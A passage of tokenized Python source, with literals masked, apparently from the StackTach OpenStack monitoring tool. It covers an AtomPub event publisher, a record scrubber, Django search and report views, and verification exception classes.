<EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> } <EOL> if state in status_map : <EOL> status = status_map [ state ] <EOL> if state == '<STR_LIT>' : <EOL> if state_description == '<STR_LIT>' : <EOL> status = '<STR_LIT>' <EOL> else : <EOL> status = '<STR_LIT>' <EOL> if state == '<STR_LIT>' : <EOL> active_map = { <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> } <EOL> status = active_map . get ( state_description , '<STR_LIT>' ) <EOL> if status == '<STR_LIT>' : <EOL> logger . error ( "<STR_LIT>" % ( <EOL> event . get ( '<STR_LIT>' ) , state , state_description ) ) <EOL> return status <EOL> def _get_times ( self , event ) : <EOL> audit_period_beginning = event . get ( '<STR_LIT>' ) <EOL> audit_period_ending = event . get ( '<STR_LIT>' ) <EOL> launched_at = event . get ( '<STR_LIT>' ) <EOL> terminated_at = event . get ( '<STR_LIT>' ) <EOL> if not terminated_at : <EOL> terminated_at = event . get ( '<STR_LIT>' ) <EOL> start_time = max ( launched_at , audit_period_beginning ) <EOL> if not terminated_at : <EOL> end_time = audit_period_ending <EOL> else : <EOL> end_time = min ( terminated_at , audit_period_ending ) <EOL> if start_time > end_time : <EOL> start_time = audit_period_beginning <EOL> return ( start_time , end_time ) <EOL> def _format_time ( self , dt ) : <EOL> time_format = "<STR_LIT>" <EOL> if dt : <EOL> return datetime . datetime . strftime ( dt , time_format ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> def _get_auth ( self , force = False , headers = None ) : <EOL> if headers is None : <EOL> headers = { } <EOL> if force or not AtomPubHandler . auth_token_cache : <EOL> auth_body = { "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:username>" : self . auth_user , <EOL> "<STR_LIT>" : self . auth_key , <EOL> } } } <EOL> auth_headers = { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:application/json>" , <EOL> "<STR_LIT:Content-Type>" : "<STR_LIT:application/json>" } <EOL> logger . debug ( "<STR_LIT>" % self . auth_server ) <EOL> res = requests . post ( self . auth_server , <EOL> data = json . dumps ( auth_body ) , <EOL> headers = auth_headers ) <EOL> res . raise_for_status ( ) <EOL> token = res . json ( ) [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT:id>" ] <EOL> logger . debug ( "<STR_LIT>" % token ) <EOL> AtomPubHandler . auth_token_cache = token <EOL> headers [ "<STR_LIT>" ] = AtomPubHandler . auth_token_cache <EOL> return headers <EOL> def _send_event ( self , atom ) : <EOL> headers = { "<STR_LIT:Content-Type>" : "<STR_LIT>" } <EOL> headers = self . _get_auth ( headers = headers ) <EOL> attempts = <NUM_LIT:0> <EOL> status = <NUM_LIT:0> <EOL> while True : <EOL> try : <EOL> res = requests . post ( self . url , <EOL> data = atom , <EOL> headers = headers , <EOL> timeout = self . http_timeout ) <EOL> status = res . status_code <EOL> if status >= <NUM_LIT:200> and status < <NUM_LIT> : <EOL> break <EOL> if status == <NUM_LIT> : <EOL> logger . info ( "<STR_LIT>" ) <EOL> headers = self . _get_auth ( headers = headers , force = True ) <EOL> continue <EOL> if status == <NUM_LIT> : <EOL> logger . debug ( "<STR_LIT>" % atom ) <EOL> break <EOL> if status == <NUM_LIT> : <EOL> logger . error ( "<STR_LIT>" <EOL> "<STR_LIT>" % atom ) <EOL> break <EOL> except requests . exceptions . ConnectionError : <EOL> logger . exception ( "<STR_LIT>" % self . url ) <EOL> except requests . exceptions . Timeout : <EOL> logger . exception ( "<STR_LIT>" % self . url ) <EOL> except requests . exceptions . HTTPError : <EOL> logger . exception ( "<STR_LIT>" <EOL> "<STR_LIT:%s>" % self . url ) <EOL> except requests . exceptions . RequestException : <EOL> logger . exception ( "<STR_LIT>" % self . url ) <EOL> attempts += <NUM_LIT:1> <EOL> wait = min ( attempts * self . wait_interval , self . max_wait ) <EOL> logger . error ( "<STR_LIT>" <EOL> "<STR_LIT>" % str ( wait ) ) <EOL> time . sleep ( wait ) <EOL> return status <EOL> def rollback ( self ) : <EOL> pass </s>
<s> import json <EOL> import uuid <EOL> from django . db . models import F <EOL> from stacktach import models <EOL> class ScrubberBase ( object ) : <EOL> def __init__ ( self , start , end ) : <EOL> self . start = start <EOL> self . end = end <EOL> def raws ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ ] . __iter__ ( ) <EOL> def filter ( self , raw_data ) : <EOL> """<STR_LIT>""" <EOL> return True , None <EOL> def scrub ( self , body ) : <EOL> """<STR_LIT>""" <EOL> return body <EOL> class ExistsCreatedAt ( ScrubberBase ) : <EOL> def raws ( self ) : <EOL> filters = { <EOL> '<STR_LIT>' : self . start , <EOL> '<STR_LIT>' : self . end , <EOL> '<STR_LIT>' : F ( '<STR_LIT>' ) + ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) <EOL> } <EOL> exists = models . InstanceExists . objects . filter ( ** filters ) <EOL> exists = exists . select_related ( '<STR_LIT>' ) <EOL> for exist in exists . iterator ( ) : <EOL> rawdata = exist . raw <EOL> yield { '<STR_LIT>' : rawdata . json } <EOL> def filter ( self , raw_data ) : <EOL> if '<STR_LIT>' in raw_data [ '<STR_LIT>' ] : <EOL> body = json . loads ( raw_data [ '<STR_LIT>' ] ) [ <NUM_LIT:1> ] <EOL> created_at = body . get ( '<STR_LIT>' , { } ) . get ( '<STR_LIT>' ) <EOL> if created_at and '<STR_LIT>' in created_at : <EOL> return True , body <EOL> else : <EOL> return False , None <EOL> else : <EOL> return False , None <EOL> def scrub ( self , body ) : <EOL> created_at = body [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> scrubbed_created_at = created_at . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> body [ '<STR_LIT>' ] [ '<STR_LIT>' ] = scrubbed_created_at <EOL> body [ '<STR_LIT>' ] = str ( uuid . uuid4 ( ) ) <EOL> return body </s>
<s> from copy import deepcopy <EOL> import decimal <EOL> import datetime <EOL> import json <EOL> from django . db . models import Q <EOL> from django . http import HttpResponse <EOL> from django . shortcuts import get_object_or_404 <EOL> import datetime_to_decimal as dt <EOL> import models <EOL> import utils <EOL> from django . core . exceptions import ObjectDoesNotExist , FieldError , ValidationError <EOL> SECS_PER_HOUR = <NUM_LIT> * <NUM_LIT> <EOL> SECS_PER_DAY = SECS_PER_HOUR * <NUM_LIT> <EOL> DEFAULT_LIMIT = <NUM_LIT:50> <EOL> HARD_LIMIT = <NUM_LIT:1000> <EOL> UTC_FORMAT = '<STR_LIT>' <EOL> def _get_limit ( request ) : <EOL> limit = request . GET . get ( '<STR_LIT>' , DEFAULT_LIMIT ) <EOL> if limit : <EOL> limit = int ( limit ) <EOL> if limit > HARD_LIMIT : <EOL> limit = HARD_LIMIT <EOL> return limit <EOL> def _get_query_range ( request ) : <EOL> limit = _get_limit ( request ) <EOL> offset = request . GET . get ( '<STR_LIT>' ) <EOL> start = None <EOL> if offset : <EOL> start = int ( offset ) <EOL> else : <EOL> offset = <NUM_LIT:0> <EOL> end = int ( offset ) + int ( limit ) <EOL> return start , end <EOL> def model_search ( request , model , filters , <EOL> related = False , order_by = None , excludes = None ) : <EOL> query = model <EOL> if related : <EOL> query = query . select_related ( ) <EOL> if filters : <EOL> query = query . filter ( ** filters ) <EOL> else : <EOL> query = query . all ( ) <EOL> if excludes : <EOL> for exclude in excludes : <EOL> if isinstance ( exclude , dict ) : <EOL> query = query . exclude ( ** exclude ) <EOL> else : <EOL> query = query . exclude ( exclude ) <EOL> if order_by : <EOL> query = query . order_by ( order_by ) <EOL> start , end = _get_query_range ( request ) <EOL> query = query [ start : end ] <EOL> return query <EOL> def _add_when_filters ( request , filters ) : <EOL> when_max = request . GET . get ( '<STR_LIT>' ) <EOL> if when_max : <EOL> filters [ '<STR_LIT>' ] = decimal . Decimal ( when_max ) <EOL> when_min = request . GET . get ( '<STR_LIT>' ) <EOL> if when_min : <EOL> filters [ '<STR_LIT>' ] = decimal . Decimal ( when_min ) <EOL> def get_event_names ( service = '<STR_LIT>' ) : <EOL> return _model_factory ( service ) . values ( '<STR_LIT>' ) . distinct ( ) <EOL> def get_all_event_names ( ) : <EOL> services = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> events = [ ] <EOL> for service in services : <EOL> events . extend ( get_event_names ( service ) ) <EOL> return events <EOL> def get_host_names ( service ) : <EOL> return _model_factory ( service ) . values ( '<STR_LIT:host>' ) . distinct ( ) <EOL> def routing_key_type ( key ) : <EOL> if key . endswith ( '<STR_LIT:error>' ) : <EOL> return '<STR_LIT:E>' <EOL> return '<STR_LIT:U+0020>' <EOL> def get_deployments ( ) : <EOL> return models . Deployment . objects . all ( ) . order_by ( '<STR_LIT:name>' ) <EOL> def get_timings_for_uuid ( request , uuid ) : <EOL> model = models . Lifecycle . objects <EOL> filters = { '<STR_LIT>' : uuid } <EOL> lifecycles = model_search ( request , model , filters ) <EOL> results = [ [ "<STR_LIT:?>" , "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> for lc in lifecycles : <EOL> timings = models . Timing . objects . filter ( lifecycle = lc ) <EOL> if not timings : <EOL> continue <EOL> for t in timings : <EOL> state = "<STR_LIT:?>" <EOL> show_time = '<STR_LIT>' <EOL> if t . start_raw : <EOL> state = '<STR_LIT:S>' <EOL> if t . end_raw : <EOL> state = '<STR_LIT:E>' <EOL> if t . start_raw and t . end_raw : <EOL> state = "<STR_LIT:.>" <EOL> show_time = sec_to_time ( t . diff ) <EOL> results . append ( [ state , t . name , show_time ] ) <EOL> return results <EOL> def sec_to_time ( diff ) : <EOL> seconds = int ( diff ) <EOL> usec = diff - seconds <EOL> days = seconds / SECS_PER_DAY <EOL> seconds -= ( days * SECS_PER_DAY ) <EOL> hours = seconds / SECS_PER_HOUR <EOL> seconds -= ( hours * SECS_PER_HOUR ) <EOL> minutes = seconds / <NUM_LIT> <EOL> seconds -= ( minutes * <NUM_LIT> ) <EOL> usec = str ( usec ) [ <NUM_LIT:1> : <NUM_LIT:4> ] <EOL> return "<STR_LIT>" % ( days , hours , minutes , seconds , usec ) <EOL> def rsp ( data , status = <NUM_LIT:200> , content_type = "<STR_LIT:application/json>" ) : <EOL> return HttpResponse ( data , content_type = content_type , status = status ) <EOL> def error_response ( status , type , message ) : <EOL> results = [ [ "<STR_LIT>" , "<STR_LIT>" ] , [ type , message ] ] <EOL> return rsp ( json . dumps ( results ) , status ) <EOL> def do_deployments ( request ) : <EOL> deployments = get_deployments ( ) <EOL> results = [ [ "<STR_LIT:#>" , "<STR_LIT:Name>" ] ] <EOL> for deployment in deployments : <EOL> results . append ( [ deployment . id , deployment . name ] ) <EOL> return rsp ( json . dumps ( results ) ) <EOL> def do_events ( request ) : <EOL> service = str ( request . GET . get ( '<STR_LIT>' , '<STR_LIT:all>' ) ) <EOL> if service == '<STR_LIT:all>' : <EOL> events = get_all_event_names ( ) <EOL> else : <EOL> events = get_event_names ( service = service ) <EOL> results = [ [ "<STR_LIT>" ] ] <EOL> for event in events : <EOL> results . append ( [ event [ '<STR_LIT>' ] ] ) <EOL> return rsp ( json . dumps ( results ) ) <EOL> def do_hosts ( request ) : <EOL> service = str ( request . GET . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> hosts = get_host_names ( service ) <EOL> results = [ [ "<STR_LIT>" ] ] <EOL> for host in hosts : <EOL> results . append ( [ host [ '<STR_LIT:host>' ] ] ) <EOL> return rsp ( json . dumps ( results ) ) <EOL> def do_uuid ( request ) : <EOL> uuid = str ( request . GET [ '<STR_LIT>' ] ) <EOL> service = str ( request . GET . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if not utils . is_uuid_like ( uuid ) : <EOL> msg = "<STR_LIT>" % uuid <EOL> return error_response ( <NUM_LIT> , '<STR_LIT>' , msg ) <EOL> model = _model_factory ( service ) <EOL> result = [ ] <EOL> filters = { } <EOL> if service == '<STR_LIT>' or service == '<STR_LIT>' : <EOL> filters = { '<STR_LIT>' : uuid } <EOL> if service == '<STR_LIT>' : <EOL> filters = { '<STR_LIT>' : uuid } <EOL> _add_when_filters ( request , filters ) <EOL> related = model_search ( request , model , filters , <EOL> related = True , order_by = '<STR_LIT>' ) <EOL> for event in related : <EOL> when = dt . dt_from_decimal ( event . when ) <EOL> routing_key_status = routing_key_type ( event . routing_key ) <EOL> result = event . search_results ( result , when , routing_key_status ) <EOL> return rsp ( json . dumps ( result ) ) <EOL> def do_timings_uuid ( request ) : <EOL> uuid = request . GET [ '<STR_LIT>' ] <EOL> if not utils . is_uuid_like ( uuid ) : <EOL> msg = "<STR_LIT>" % uuid <EOL> return error_response ( <NUM_LIT> , '<STR_LIT>' , msg ) <EOL> results = get_timings_for_uuid ( request , uuid ) <EOL> return rsp ( json . dumps ( results ) ) <EOL> def do_timings ( request ) : <EOL> name = request . GET [ '<STR_LIT:name>' ] <EOL> model = models . Timing . objects <EOL> filters = { <EOL> '<STR_LIT:name>' : name <EOL> } <EOL> if request . GET . get ( '<STR_LIT>' ) is not None : <EOL> min_when = decimal . Decimal ( request . GET [ '<STR_LIT>' ] ) <EOL> filters [ '<STR_LIT>' ] = min_when <EOL> if request . GET . get ( '<STR_LIT>' ) is not None : <EOL> max_when = decimal . Decimal ( request . GET [ '<STR_LIT>' ] ) <EOL> filters [ '<STR_LIT>' ] = max_when <EOL> excludes = [ Q ( start_raw = None ) | Q ( end_raw = None ) , ] <EOL> timings = model_search ( request , model , filters , <EOL> excludes = excludes , related = True , <EOL> order_by = '<STR_LIT>' ) <EOL> results = [ [ name , "<STR_LIT>" ] ] <EOL> for t in timings : <EOL> results . append ( [ t . lifecycle . instance , sec_to_time ( t . diff ) ] ) <EOL> return rsp ( json . dumps ( results ) ) <EOL> def do_summary ( request ) : <EOL> events = get_event_names ( ) <EOL> interesting = [ ] <EOL> for e in events : <EOL> ev = e [ '<STR_LIT>' ] <EOL> if ev . endswith ( '<STR_LIT>' ) : <EOL> interesting . append ( ev [ : - len ( '<STR_LIT>' ) ] ) <EOL> results = [ [ "<STR_LIT>" , "<STR_LIT:N>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> for name in interesting : <EOL> model = models . Timing . objects <EOL> filters = { '<STR_LIT:name>' : name } <EOL> excludes = [ <EOL> Q ( start_raw = None ) | Q ( end_raw = None ) , <EOL> { '<STR_LIT>' : <NUM_LIT:0> } <EOL> ] <EOL> timings = model_search ( request , model , filters , <EOL> excludes = excludes ) <EOL> if not timings : <EOL> continue <EOL> total , _min , _max = <NUM_LIT:0.0> , None , None <EOL> num = len ( timings ) <EOL> for t in timings : <EOL> seconds = float ( t . diff ) <EOL> total += seconds <EOL> if _min is None : <EOL> _min = seconds <EOL> if _max is None : <EOL> _max = seconds <EOL> _min = min ( _min , seconds ) <EOL> _max = max ( _max , seconds ) <EOL> results . append ( [ name , int ( num ) , sec_to_time ( _min ) , <EOL> sec_to_time ( _max ) , sec_to_time ( int ( total / num ) ) ] ) <EOL> return rsp ( json . dumps ( results ) ) <EOL> def do_request ( request ) : <EOL> request_id = request . GET [ '<STR_LIT>' ] <EOL> if not utils . is_request_id_like ( request_id ) : <EOL> msg = "<STR_LIT>" % request_id <EOL> return error_response ( <NUM_LIT> , '<STR_LIT>' , msg ) <EOL> model = models . RawData . objects <EOL> filters = { '<STR_LIT>' : request_id } <EOL> _add_when_filters ( request , filters ) <EOL> events = model_search ( request , model , filters , order_by = '<STR_LIT>' ) <EOL> results = [ [ "<STR_LIT:#>" , "<STR_LIT:?>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> for e in events : <EOL> when = dt . dt_from_decimal ( e . when ) <EOL> results . append ( [ e . id , routing_key_type ( e . routing_key ) , str ( when ) , <EOL> e . deployment . name , e . event , e . host , e . state , <EOL> e . old_state , e . old_task ] ) <EOL> return rsp ( json . dumps ( results ) ) <EOL> def append_nova_raw_attributes ( event , results ) : <EOL> results . append ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> results . append ( [ "<STR_LIT:#>" , event . id ] ) <EOL> when = dt . dt_from_decimal ( event . when ) <EOL> results . append ( [ "<STR_LIT>" , str ( when ) ] ) <EOL> results . append ( [ "<STR_LIT>" , event . deployment . name ] ) <EOL> results . append ( [ "<STR_LIT>" , event . routing_key ] ) <EOL> results . append ( [ "<STR_LIT>" , event . publisher ] ) <EOL> results . append ( [ "<STR_LIT>" , event . state ] ) <EOL> results . append ( [ "<STR_LIT>" , event . event ] ) <EOL> results . append ( [ "<STR_LIT>" , event . service ] ) <EOL> results . append ( [ "<STR_LIT>" , event . host ] ) <EOL> results . append ( [ "<STR_LIT>" , event . instance ] ) <EOL> results . append ( [ "<STR_LIT>" , event . request_id ] ) <EOL> return results <EOL> def append_glance_raw_attributes ( event , results ) : <EOL> results . append ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> results . append ( [ "<STR_LIT:#>" , event . id ] ) <EOL> when = dt . dt_from_decimal ( event . when ) <EOL> results . append ( [ "<STR_LIT>" , str ( when ) ] ) <EOL> results . append ( [ "<STR_LIT>" , event . deployment . name ] ) <EOL> results . append ( [ "<STR_LIT>" , event . routing_key ] ) <EOL> results . append ( [ "<STR_LIT>" , event . publisher ] ) <EOL> results . append ( [ "<STR_LIT>" , event . status ] ) <EOL> results . append ( [ "<STR_LIT>" , event . event ] ) <EOL> results . append ( [ "<STR_LIT>" , event . service ] ) <EOL> results . append ( [ "<STR_LIT>" , event . host ] ) <EOL> results . append ( [ "<STR_LIT>" , event . uuid ] ) <EOL> results . append ( [ "<STR_LIT>" , event . request_id ] ) <EOL> return results <EOL> def append_generic_raw_attributes ( event , results ) : <EOL> results . append ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> results . append ( [ "<STR_LIT:#>" , event . id ] ) <EOL> when = dt . dt_from_decimal ( event . when ) <EOL> results . append ( [ "<STR_LIT>" , str ( when ) ] ) <EOL> results . append ( [ "<STR_LIT>" , event . deployment . name ] ) <EOL> results . append ( [ "<STR_LIT>" , event . routing_key ] ) <EOL> results . append ( [ "<STR_LIT>" , event . publisher ] ) <EOL> results . append ( [ "<STR_LIT>" , event . state ] ) <EOL> results . append ( [ "<STR_LIT>" , event . event ] ) <EOL> results . append ( [ "<STR_LIT>" , event . service ] ) <EOL> results . append ( [ "<STR_LIT>" , event . host ] ) <EOL> results . append ( [ "<STR_LIT>" , event . instance ] ) <EOL> results . append ( [ "<STR_LIT>" , event . request_id ] ) <EOL> return results <EOL> def _append_raw_attributes ( event , results , service ) : <EOL> if service == '<STR_LIT>' : <EOL> return append_nova_raw_attributes ( event , results ) <EOL> if service == '<STR_LIT>' : <EOL> return append_glance_raw_attributes ( event , results ) <EOL> if service == '<STR_LIT>' : <EOL> return append_generic_raw_attributes ( event , results ) <EOL> def do_show ( request , event_id ) : <EOL> service = str ( request . GET . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> event_id = int ( event_id ) <EOL> results = [ ] <EOL> model = _model_factory ( service ) <EOL> try : <EOL> event = model . get ( id = event_id ) <EOL> results = _append_raw_attributes ( event , results , service ) <EOL> final = [ results , ] <EOL> j = json . loads ( event . json ) <EOL> final . append ( json . dumps ( j , indent = <NUM_LIT:2> ) ) <EOL> final . append ( event . uuid ) <EOL> return rsp ( json . dumps ( final ) ) <EOL> except ObjectDoesNotExist : <EOL> return rsp ( { } ) <EOL> def _model_factory ( service ) : <EOL> if service == '<STR_LIT>' : <EOL> return models . GlanceRawData . objects <EOL> elif service == '<STR_LIT>' : <EOL> return models . RawData . objects <EOL> elif service == '<STR_LIT>' : <EOL> return models . GenericRawData . objects <EOL> def do_watch ( request , deployment_id ) : <EOL> service = str ( request . GET . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> model = _model_factory ( service ) <EOL> deployment_id = int ( deployment_id ) <EOL> since = request . GET . get ( '<STR_LIT>' ) <EOL> event_name = request . GET . get ( '<STR_LIT>' ) <EOL> deployment_map = { } <EOL> for d in get_deployments ( ) : <EOL> deployment_map [ d . id ] = d <EOL> events = get_event_names ( ) <EOL> max_event_width = max ( [ len ( event [ '<STR_LIT>' ] ) for event in events ] ) <EOL> base_events = model . order_by ( '<STR_LIT>' ) <EOL> if deployment_id > <NUM_LIT:0> : <EOL> base_events = base_events . filter ( deployment = deployment_id ) <EOL> if event_name : <EOL> base_events = base_events . filter ( event = event_name ) <EOL> now = datetime . datetime . utcnow ( ) <EOL> now = now . replace ( microsecond = <NUM_LIT:0> ) <EOL> dec_now = dt . dt_to_decimal ( now ) <EOL> if since : <EOL> since = decimal . Decimal ( since ) <EOL> else : <EOL> since = now - datetime . timedelta ( seconds = <NUM_LIT:2> ) <EOL> since = dt . dt_to_decimal ( since ) <EOL> base_events = base_events . filter ( when__gt = since ) <EOL> events = base_events . filter ( when__lte = dec_now ) <EOL> c = [ <NUM_LIT:10> , <NUM_LIT:1> , <NUM_LIT:15> , <NUM_LIT:20> , max_event_width , <NUM_LIT> ] <EOL> results = [ ] <EOL> for raw in events : <EOL> uuid = raw . uuid <EOL> if not uuid : <EOL> uuid = "<STR_LIT:->" <EOL> typ = routing_key_type ( raw . routing_key ) <EOL> when = dt . dt_from_decimal ( raw . when ) <EOL> results . append ( [ raw . id , typ , <EOL> str ( when . date ( ) ) , str ( when . time ( ) ) , <EOL> deployment_map [ raw . deployment . id ] . name , <EOL> raw . event , <EOL> uuid ] ) <EOL> results_json = json . dumps ( [ c , results , str ( dec_now ) ] ) <EOL> return rsp ( results_json ) <EOL> def do_kpi ( request , tenant_id = None ) : <EOL> if tenant_id : <EOL> if models . RawData . objects . filter ( tenant = tenant_id ) . count ( ) == <NUM_LIT:0> : <EOL> message = "<STR_LIT>" % tenant_id <EOL> return error_response ( <NUM_LIT> , '<STR_LIT>' , message ) <EOL> yesterday = datetime . datetime . utcnow ( ) - datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> yesterday = dt . dt_to_decimal ( yesterday ) <EOL> trackers = models . RequestTracker . objects . select_related ( ) . exclude ( last_timing = None ) . exclude ( start__lt = yesterday ) . order_by ( '<STR_LIT>' ) <EOL> results = [ [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> for track in trackers : <EOL> end_event = track . last_timing . end_raw <EOL> event = end_event . event [ : - len ( "<STR_LIT>" ) ] <EOL> uuid = track . lifecycle . instance <EOL> if tenant_id is None or ( tenant_id == end_event . tenant ) : <EOL> results . append ( [ event , sec_to_time ( track . duration ) , <EOL> uuid , end_event . deployment . name ] ) <EOL> return rsp ( json . dumps ( results ) ) <EOL> def do_jsonreports ( request ) : <EOL> yesterday = datetime . datetime . utcnow ( ) - datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> now = datetime . datetime . utcnow ( ) <EOL> yesterday = dt . dt_to_decimal ( yesterday ) <EOL> now = dt . dt_to_decimal ( now ) <EOL> _from = request . GET . get ( '<STR_LIT>' , yesterday ) <EOL> _to = request . GET . get ( '<STR_LIT>' , now ) <EOL> model = models . JsonReport . objects <EOL> filters = { <EOL> '<STR_LIT>' : _from , <EOL> '<STR_LIT>' : _to <EOL> } <EOL> reports = model_search ( request , model , filters ) <EOL> results = [ [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:Name>' , '<STR_LIT>' ] ] <EOL> for report in reports : <EOL> results . append ( [ report . id , <EOL> float ( dt . dt_to_decimal ( report . period_start ) ) , <EOL> float ( dt . dt_to_decimal ( report . period_end ) ) , <EOL> float ( report . created ) , <EOL> report . name , <EOL> report . version ] ) <EOL> return rsp ( json . dumps ( results ) ) <EOL> def do_jsonreport ( request , report_id ) : <EOL> report_id = int ( report_id ) <EOL> report = get_object_or_404 ( models . JsonReport , pk = report_id ) <EOL> return rsp ( report . json ) <EOL> def search ( request ) : <EOL> service = str ( request . GET . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> field = request . GET . get ( '<STR_LIT>' ) <EOL> value = request . GET . get ( '<STR_LIT:value>' ) <EOL> model = _model_factory ( service ) <EOL> filters = { field : value } <EOL> _add_when_filters ( request , filters ) <EOL> results = [ ] <EOL> try : <EOL> events = model_search ( request , model , filters , order_by = '<STR_LIT>' ) <EOL> for event in events : <EOL> when = dt . dt_from_decimal ( event . when ) <EOL> routing_key_status = routing_key_type ( event . routing_key ) <EOL> results = event . search_results ( results , when , routing_key_status ) <EOL> return rsp ( json . dumps ( results ) ) <EOL> except ObjectDoesNotExist : <EOL> return error_response ( <NUM_LIT> , '<STR_LIT>' , [ "<STR_LIT>" ] ) <EOL> except FieldError : <EOL> return error_response ( <NUM_LIT> , '<STR_LIT>' , "<STR_LIT>" <EOL> "<STR_LIT>" % field ) <EOL> class BadRequestException ( Exception ) : <EOL> pass <EOL> def _parse_created ( created ) : <EOL> try : <EOL> created_datetime = datetime . datetime . strptime ( created , '<STR_LIT>' ) <EOL> return dt . dt_to_decimal ( created_datetime ) <EOL> except ValueError : <EOL> raise BadRequestException ( <EOL> "<STR_LIT>" <EOL> % created ) <EOL> def _parse_id ( id ) : <EOL> try : <EOL> return int ( id ) <EOL> except ValueError : <EOL> raise BadRequestException ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % id ) <EOL> def _parse_fields_and_create_query_filters ( request_filters ) : <EOL> query_filters = { } <EOL> for field , value in request_filters . iteritems ( ) : <EOL> if field == '<STR_LIT>' : <EOL> decimal_created = _parse_created ( value ) <EOL> query_filters [ '<STR_LIT>' ] = decimal_created <EOL> query_filters [ '<STR_LIT>' ] = decimal_created + SECS_PER_DAY <EOL> elif field == '<STR_LIT:id>' : <EOL> id = _parse_id ( value ) <EOL> query_filters [ '<STR_LIT>' ] = id <EOL> else : <EOL> query_filters [ field + '<STR_LIT>' ] = value <EOL> return query_filters <EOL> def _check_if_fields_searchable ( request_filters ) : <EOL> allowed_fields = [ '<STR_LIT:id>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> invalid_fields = [ field for field in request_filters . keys ( ) <EOL> if field not in allowed_fields ] <EOL> if invalid_fields : <EOL> raise BadRequestException ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> '<STR_LIT:U+002CU+0020>' . join ( sorted ( invalid_fields ) ) ) <EOL> def _create_query_filters ( request ) : <EOL> request_filters = deepcopy ( request . GET ) <EOL> request_filters . pop ( '<STR_LIT>' , None ) <EOL> request_filters . pop ( '<STR_LIT>' , None ) <EOL> _check_if_fields_searchable ( request_filters ) <EOL> return _parse_fields_and_create_query_filters ( request_filters ) <EOL> def do_jsonreports_search ( request ) : <EOL> try : <EOL> model = models . JsonReport <EOL> filters = _create_query_filters ( request ) <EOL> reports = model_search ( request , model . objects , filters , <EOL> order_by = '<STR_LIT>' ) <EOL> results = [ [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:Name>' , '<STR_LIT>' ] ] <EOL> for report in reports : <EOL> results . append ( [ report . id , <EOL> datetime . datetime . strftime ( <EOL> report . period_start , UTC_FORMAT ) , <EOL> datetime . datetime . strftime ( <EOL> report . period_end , UTC_FORMAT ) , <EOL> datetime . datetime . strftime ( <EOL> dt . dt_from_decimal ( report . created ) , <EOL> UTC_FORMAT ) , <EOL> report . name , <EOL> report . version ] ) <EOL> except BadRequestException as be : <EOL> return error_response ( <NUM_LIT> , '<STR_LIT>' , str ( be ) ) <EOL> except ValidationError as ve : <EOL> return error_response ( <NUM_LIT> , '<STR_LIT>' , ve . messages [ <NUM_LIT:0> ] ) <EOL> return rsp ( json . dumps ( results ) ) </s>
<s> import datetime <EOL> class VerificationException ( Exception ) : <EOL> def __init__ ( self , reason ) : <EOL> self . reason = reason <EOL> def __str__ ( self ) : <EOL> return self . reason <EOL> class NotFound ( VerificationException ) : <EOL> def __init__ ( self , object_type , search_params ) : <EOL> self . object_type = object_type <EOL> self . search_params = search_params <EOL> self . reason = "<STR_LIT>" % ( self . object_type , <EOL> self . search_params ) <EOL> class AmbiguousResults ( VerificationException ) : <EOL> def __init__ ( self , object_type , search_params ) : <EOL> self . object_type = object_type <EOL> self . search_params = search_params <EOL> msg = "<STR_LIT>" % ( self . object_type , <EOL> self . search_params ) <EOL> self . reason = msg <EOL> class FieldMismatch ( VerificationException ) : <EOL> def __init__ ( self , field_name , entity_1 , entity_2 , uuid ) : <EOL> self . field_name = field_name <EOL> self . entity_1 = entity_1 <EOL> self . entity_2 = entity_2 <EOL> self . uuid = uuid <EOL> self . reason = "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" . format ( failed_at = datetime . datetime . utcnow ( ) , uuid = self . uuid , <EOL> field_name = self . field_name , name_1 = entity_1 [ '<STR_LIT:name>' ] , <EOL> value_1 = self . entity_1 [ '<STR_LIT:value>' ] , <EOL> name_2 = self . entity_2 [ '<STR_LIT:name>' ] , <EOL> value_2 = self . entity_2 [ '<STR_LIT:value>' ] ) <EOL> class NullFieldException ( VerificationException ) : <EOL> def __init__ ( 